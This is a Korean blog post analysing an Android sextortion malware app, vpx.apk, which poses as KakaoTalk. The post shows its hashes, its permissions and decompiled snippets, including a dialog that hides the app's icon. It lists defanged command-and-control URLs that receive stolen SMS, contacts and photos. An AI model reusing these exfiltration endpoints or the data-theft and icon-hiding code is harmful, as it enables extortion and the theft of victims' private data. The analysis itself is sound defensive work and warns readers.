꿈을꾸는 파랑새

반응형

오늘은 안드로이드 몸캠인 vpx.apk(동영상)에 대해 알아보겠습니다. 일단 몸캠 이라는 것은 간단하게 음란 채팅을 하다가 너 이 파일 다운로드 해야 더 이야기할 것이니~이런저런 이야기로 사용자 스마트폰에다가 해당 APK 파일을 내려받기해서 설치해서 실행하게 하는 수법을 사용하고 있고 이렇게 설치가 되면 스마트폰에 있는 연락처 정보는 기본적으로 뺴가나가고 그리고 해당 연락처를 바탕으로 너~돈 안 보내시면 연락처에 있는 사람들한테 너~거시기 한 동영상 뿌린다고 협박을 하는 방식이고 그렇다고 돈을 주더라도 동영상 삭제를 해주는 것은 당연히 안될 확률도 높습니다.
일단 오늘 vpx.apk(동영상)이라는 것은 대해 알아보겠습니다. 먼저 해쉬값은 다음과 같습니다.
MD5:2914abd93ab252a7dacd23aa6958a7f6
SHA-1:53d04d427f7194f24069f002300acbbc850fa9cd
SHA-256:43bcb986c1eca65bde66010582ad43bede092d93c9f23b0b95872d4cb5dd8ac0

vpx.apk(동영상) AndroidManifest.xmlvpx.apk(동영상) AndroidManifest.xml

그리고 해당 APK 파일을 분해짓? 을 하면 AndroidManifest.xml 에서는 다음과 같습니다.
<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas(.)android.com/apk/res/android" android:compileSdkVersion="28" android:compileSdkVersionCodename="9" package="com.karean(.)kakaotalk" platformBuildVersionCode="28" platformBuildVersionName="9">
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>

com.open.gitmessage.http.fcom.open.gitmessage.http.f

보시면 문자, 스마트폰 저장공간, 와이파이, 네트워크, 연락처 등을 볼 수가 있습니다.
com.open.gitmessage.receiver.SmsReceiver 에 있는 내용은 다음과 같습니다.
public class SmsReceiver extends BroadcastReceiver {
    /* renamed from: b */
    public static String m4835b() {
        return new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date(System.currentTimeMillis()));
    }
    /* access modifiers changed from: protected */
    /* renamed from: a */
    public String mo4679a() {
        return "http://api082804.seemonitor(.)xyz/uploadSms(.)htm";
업로드 관련 부분:
http://api082804.seemonitor(.)xyz/sychonizeUser.htm http://api082804.seemonitor(.)xyz/uploadAlbum.htm http://api082804.seemonitor(.)xyz/uploadContact.htm http://api082804.seemonitor(.)xyz/uploadSms.htm
그리고 com.open.gitmessage.http.f 부분에 있는 내용은 다음과 같습니다.
private void b(Context paramContext) {
    String str;
    NetworkInfo networkInfo = ((ConnectivityManager)paramContext.getSystemService("connectivity")).getActiveNetworkInfo();
    d.a("############当前网络状态改变#############");
    if (networkInfo == null) {
      str = "";
    } else {
      StringBuilder stringBuilder = new StringBuilder();
      stringBuilder.append("******当前活动网络为");
      stringBuilder.append(networkInfo.getTypeName());
      d.a(stringBuilder.toString());
      if (1 == networkInfo.getType()) {
        a("");
        a(true);
        return;
      }
      if (networkInfo.getType() == 0) {
        str = b.a((Context)str);
      } else {
        return;
여기서 중국 부분이 있는데 중국어 몰라서 구글 번역기 돌려보면 다음과 같이 번역이 되었습니다.

com.open.gitmessage.MainActivityBakcom.open.gitmessage.MainActivityBak

当前网络状态改变:현재 네트워크 상태 변경
当前活动网络为:현재 활성 네트워크는

com.open.gitmessage.receiver.SmsReceivercom.open.gitmessage.receiver.SmsReceiver

com.open.gitmessage.MainActivityBak 관련 부분에 보면 다음과 같습니다.
package com.open.gitmessage;
import android.annotation.SuppressLint;
import android.app.Activity;
import android.app.AlertDialog;
import android.content.Context;
import android.content.DialogInterface;
import android.content.Intent;
import android.os.Build;
import android.os.Bundle;
import android.os.Handler;
import android.os.Message;
import android.text.TextUtils;
import android.view.View;
import com.open.gitmessage.a.c;
import com.open.gitmessage.a.e;
import com.yanzhenjie.permission.a;
import com.yanzhenjie.permission.d;
import com.yanzhenjie.permission.h;
import com.yanzhenjie.permission.j;
import com.yanzhenjie.permission.k;
import java.util.List;
import java.util.UUID;

@SuppressLint({"NewApi"})
public class MainActivityBak extends Activity implements View.OnClickListener {
  int a = 0;
 
  AlertDialog b;
 
  private Handler c = new Handler(this) {
      public void handleMessage(Message param1Message) {
        if (param1Message.what == this.a.a) {
          AlertDialog.Builder builder = new AlertDialog.Builder((Context)this.a);
          builder.setMessage("서버정검중입니다").setTitle("").setCancelable(false).setPositiveButton("OK", new DialogInterface.OnClickListener(this) {
                public void onClick(DialogInterface param2DialogInterface, int param2Int) {
                  this.a.a.getPackageManager().setComponentEnabledSetting(this.a.a.getComponentName(), 2, 1);
                  this.a.a.finish();
                }
              });
          this.a.b = builder.create();
          this.a.b.show();
        }
      }
    };
서버정검중입니다 이라는 문구를 볼 수가 있는데 서버정검중입니다. 이 아니고 서버 점검 중입니다. 라는 것을 알 수가 있습니다. 한국어 맞춤법도 틀린 내용을 넣은 것을 볼 수가 있습니다. (아마도 중국인, 조선족 아니면 오타일 가능성으로 추측해 봅니다.)

vpx.apk(동영상) 도메인 위치vpx.apk(동영상) 도메인 위치

여기서 사용이 되는 Api082804.seemonitor(.)xyz 부분을 보면 다음과 같은 정보를 확인을 할수가 있습니다.
Nameservers:   
ns20.domaincontrol.com:173(.)201.77.10
ns19.domaincontrol.com:97.74(.)109.10
Location For an IP: Api082804(.)seemonitor.xyz
Continent:North America (NA)
Country:United States
IP Location Find In United States (US)
Capital:Washington
State:Unknown
City Location:Unknown
ISP:CloudRadium L.L.C
Organization:CloudRadium L.L.C
AS Number:AS33330 CloudRadium L.L.C
something went wrong!
something went wrong!
입니다.


vpx.apk(동영상, 2020.9.1)vpx.apk(동영상, 2020.9.1)

그리고 악성코드가 사용하는 주소는 다음과 같습니다.
http://api082804.seemonitor(.)xyz/sychonizeUser.htm
http://api082804.seemonitor(.)xyz/uploadContact.htm
입니다. 일단 바이러스 토탈에서 해당 APK를 올려보면 기본적으로 대부분 차단을 하고 있습니다. 일단 공식 스토어가 아니면 다운로드 및 설치를 하는 것을 권장하고(물론 가끔 악성코드 올라옴) 반드시 백신앱을 실시간 감시 및 실시간 업데이트는 반드시 해야 안전하게 스마트폰을 사용할 수가 있습니다.

반응형

공유하기

facebook twitter kakaoTalk kakaostory naver band

댓글

비밀글모드

  1. 피싱은 정말 조심해야 할 것 같아요 덕분에 잘 보고 갑니다
    2020.09.02 06:54 신고
    • 항상 조심해야 된다고 생각이 됩니다.
      2020.09.02 18:25 신고